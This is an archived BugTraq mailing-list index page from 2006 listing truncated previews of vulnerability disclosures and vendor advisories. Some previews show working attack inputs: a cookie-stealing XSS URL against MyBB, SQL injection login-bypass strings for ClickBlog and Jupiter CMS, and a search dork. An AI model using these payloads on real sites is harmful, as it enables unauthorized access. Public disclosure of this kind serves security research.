BugTraq Mode:
(Page 1061 of 1748)  < Prev  1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066  Next >
Google Search API Worms 2006-09-14
pdp (architect) (pdp gnucitizen googlemail com)
http://www.gnucitizen.org/blog/google-search-api-worms

The service that concerns me the most is Google AJAX Search API, the
new JavaScript powered search widget. In this article I cover the
potential problems with Google AJAX Search API and how it can be used
by web worms to propagate.

--
pdp (ar

[ more ]  [ reply ]
MyBB Full path and Cross site scripting vulnerabilities 2006-09-15
security soqor net
Hello

Title : MyBB Full path and Cross site scripting vulnerabilities

Discovered by : HACKERS PAL

Copyrights : HACKERS PAL

Website : WwW.SoQoR.NeT

Email : security (at) soqor (dot) net [email concealed]

xss

archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][
name]=<script>alert(document.cookie);</

[ more ]  [ reply ]
Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities 2006-09-13
x17 hotmail fr
# Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities

# Discovred By : ThE__LeO ;

# Software : Signkorn Guestbook v 1.3 ;

# Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"

# Exploit : http://Www.Exam

[ more ]  [ reply ]
RE: IE ActiveX 0day? 2006-09-15
Hayes, Bill (Bill Hayes owh com)
It looks like the flaw is a buffer overflow and not a memory corruption
error.

Initially, FrSIRT has issued an advisory, "Microsoft Internet Explorer
"daxctle.ocx" KeyFrame Memory Corruption Vulnerability", detailing a new
zero-day Internet Explorer exploit. The exploit is reportedly successful
usi

[ more ]  [ reply ]
Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection 2006-09-14
ajannhwt hotmail com
ENGLISH

# Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

# Author : ajann

# Exploit;

[CODE]

loginprocess.asp:

..

...

dim varUser

dim varPass

varUser=Request.Form("TxtUser") No Secure : )

varPass=Request.Form("TxtPass") No Secure : )

..

...

//Be

[ more ]  [ reply ]
ppalCart V(2.5 EE) Remote File Inclusion 2006-09-14
l0x3 hotmail com
+--------------------------------------------------------------------

+

+ ppalCart V(2.5 EE) Remote File Inclusion

+

+-------------------------------------------------------------------

+

+ Affected Software .: Software

+ Version .............: ppalCart 2.5 EE

+ Venedor ...........: ht

[ more ]  [ reply ]
ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection 2006-09-14
ajannhwt hotmail com
ENGLISH

# Title : ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection

# Author : ajann

# Exploit;

//Before join login page

http://[target]/[path]/default.asp

Username : ' or '

Password : ' or ' and Login Ok

# ajann,Turkey

[ more ]  [ reply ]
Re: RSA SecurID SID800 Token vulnerable by design 2006-09-14
vin theworld com
On Bugtraq and several other security forums, Hadmut Danisch <hadmut (at) danisch (dot) de [email concealed]>, a respected German information security analyst, recently published a harsh critique of one optional feature in the SID800, one of the newest of the six SecurID authentication tokens -- some with slightly different for

[ more ]  [ reply ]
[SECURITY] [DSA 1177-1] New usermin packages fix denial of service 2006-09-15
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1177-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
September 15th, 2006

[ more ]  [ reply ]
PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit 2006-09-15
Saudi unix hotmail com
#====================================================================

#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit

#====================================================================

#

#Critical Level : Dangerous

#

#By Saudi Hackrz

#

#http://www.popphoto.com/

#

#============

[ more ]  [ reply ]
[SECURITY] [DSA 1160-2] New Mozilla packages fix several vulnerabilities 2006-09-15
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1160-2 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
September 15th, 2006

[ more ]  [ reply ]
Fwd: IE ActiveX 0day? 2006-09-15
Tyop Tyip (tyoptyop gmail com) (1 replies)
Does someone have more informations about a 0day on ActiveX?
Here's my links:

http://www.milw0rm.com/exploits/2358
http://blogs.securiteam.com/index.php/archives/600
http://www.xsec.org/

--
Tyop?

[ more ]  [ reply ]
Re: Fwd: IE ActiveX 0day? 2006-09-15
H D Moore (sflist digitaloffense net)
Jupiter CMS Multiple injections 2006-09-15
security soqor net
Hello,,

Jupiter CMS Sql injections ,full path and xss vulnerabilities

Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : security (at) soqor (dot) net [email concealed]

if magic_quotes_gpc = off

login with

user name :

' or id=1/*

or

' or authorization =

[ more ]  [ reply ]
Hackers to Hackers Conference III - Call for Papers 2006-09-14
Rodrigo Rubira Branco (BSDaemon) (rodrigo kernelhacking com)
General Objectives

The H2HC have as mainly objective offer a national and internation
conference for Brazilians Hackers, strongly the ethical of hacking.

We have as mission change and desmistify the word hacker from the
pejoractive sense to show the hacker as who works in software research and
sec

[ more ]  [ reply ]
mcLinksCounter v1.1 - Remote File Include Vulnerabilities 2006-09-14
erne ernealizm com
# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----

# mcLinksCounter v1.1 - Remote File Include Vulnerabilities

# site : http://www.comscripts.com/jump.php?action=script&id=847

# Script : mcLinksCounter v1.1

# Credits : ERNE

# Contact : erne (at) ernealizm (dot) com [email concealed] and irc.gigachat.n

[ more ]  [ reply ]
Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities 2006-09-14
Steven M. Christey (coley mitre org)

l0x3 (at) hotmail (dot) com [email concealed],

There have been many vulnerability reports like this, and they don't
seem to make sense.

You are the first one to say that you actually tested it, and it
worked. Because you called it 'weird', you also clearly understand
that this does not make sense.

Maybe it's a bug in a ver

[ more ]  [ reply ]
Re: Snitz Forums 2000 v3.4.06 2006-09-13
bob gmail com
Vender has supplied a fix: http://forum.snitz.com/forum/topic.asp?TOPIC_ID=62773

[ more ]  [ reply ]
Layered Defense Advisory :Symantec AntiVirus Corporate Edition Format String Vulnerability 2006-09-14
dh layereddefense com
==================================================

Layered Defense Advisory 13 September 2006

==================================================

1) Affected Software

Symantec AntiVirus Corporate Edition 10.0

Symantec AntiVirus Corporate Edition 9.0

Symantec AntiVirus Corporate Edition 8

[ more ]  [ reply ]
SolpotCrew Advisory #9 - phpQuiz v0.01 design and coding byJule Slootbeek (pagename) Remote File Inclusion 2006-09-14
chris_hasibuan yahoo com
#############################SolpotCrew Community################################

#

# phpQuiz v0.01 design and coding byJule Slootbeek (pagename) Remote File Inclusion

#

# Download file : http://www.furor-normannicus.de/phpQuiz/download/phpQuiz.zip

#

########################################

[ more ]  [ reply ]
SIP over TLS: X.509 peer authentication vulnerability in Ingate products 2006-09-14
Per Cederqvist (ceder ingate com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SIP over TLS: X.509 peer authentication vulnerability in Ingate products
========================================================================

Product: Ingate Firewall and Ingate SIParator
Versions: all current versions
Tracking ID: 2829

Summary
==

[ more ]  [ reply ]
Fullpath disclosure in Blue Magic Board 5.5 2006-09-14
hack2prison yahoo com
Blue Magic Board (BMB) is nice forum system written by http://bmforum.com

Some file error and show fullpath. I test newest version, maybe all older versions are infected.

http://domain.ext/[bmb_path]/footer.php

http://domain.ext/[bmb_path]/header.php

http://domain.ext/[bmb_path]/include/db/db_

[ more ]  [ reply ]
Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities 2006-09-14
Carsten Eilers (ceilers-lists gmx de) (1 replies)
Hi,

(M.o.H.a.J.a.L.i) schrieb am Thu, 14 Sep 2006 02:17:53 +0300:

>Have You Tried it before commenting???

Of course, and include_location is initialized in 1.20
and 1.30.

>we know it has been initialized but it weirdly works...

Which PHP/Webserver/System?

Maybe it depends on special versions?

[ more ]  [ reply ]
Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities 2006-09-15
eddy BAck0o (eddy_back0o hotmail com)
Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit 2006-09-13
saudi unix hotmail com
#====================================================================

#Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

#====================================================================

#

#Critical Level : Dangerous

#

#By Saudi Hackrz

#

#http://www.reamdaysoft.com

#ht

[ more ]  [ reply ]
PhotoPost =>4.6 (PP_PATH) Remote File Inclusion Exploit 2006-09-14
saudi unix hotmail com
#====================================================================

#PhotoPost =>4.6 (PP_PATH) Remote File Inclusion Exploit

#====================================================================

#

#Critical Level : Dangerous

#

#By Saudi Hackrz

#

#http://www.popphoto.com/

#

#=============

[ more ]  [ reply ]
[security bulletin] HPSBUX02126 SSRT051019 rev.1 - HP-UX running X.25 Local Denial of Service (Dos) 2006-09-14
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00705202
Version: 1

HPSBUX02126 SSRT051019 rev.1 - HP-UX running X.25 Local Denial of Service (Dos)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

R

[ more ]  [ reply ]
[USN-346-2] Fixed linux-restricted-modules-2.6.15 for previous Linux kernel update 2006-09-14
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-346-2 September 14, 2006
linux-restricted-modules-2.6.15 regression fix
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LT

[ more ]  [ reply ]
Secunia Research: Tagger LE PHP "eval()" Injection Vulnerabilities 2006-09-14
Secunia Research (vuln-remove secunia com)
======================================================================

Secunia Research 14/09/2006

- Tagger LE PHP "eval()" Injection Vulnerabilities -

======================================================================
Table of Contents

Affected Software.........

[ more ]  [ reply ]
XSS vulnerability in Blojsom 2006-09-14
p3rlhax gmail com


I. BACKGROUND

Taken from the Blojsom Website :

"Blojsom is a Java-based, full-featured, multi-blog, multi-user software package that was inspired by blosxom. blojsom aims to retain a simplicity in design while adding flexibility in areas such as the flavors, templating, plugins, and the abil

[ more ]  [ reply ]
(Page 1061 of 1748)  < Prev  1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus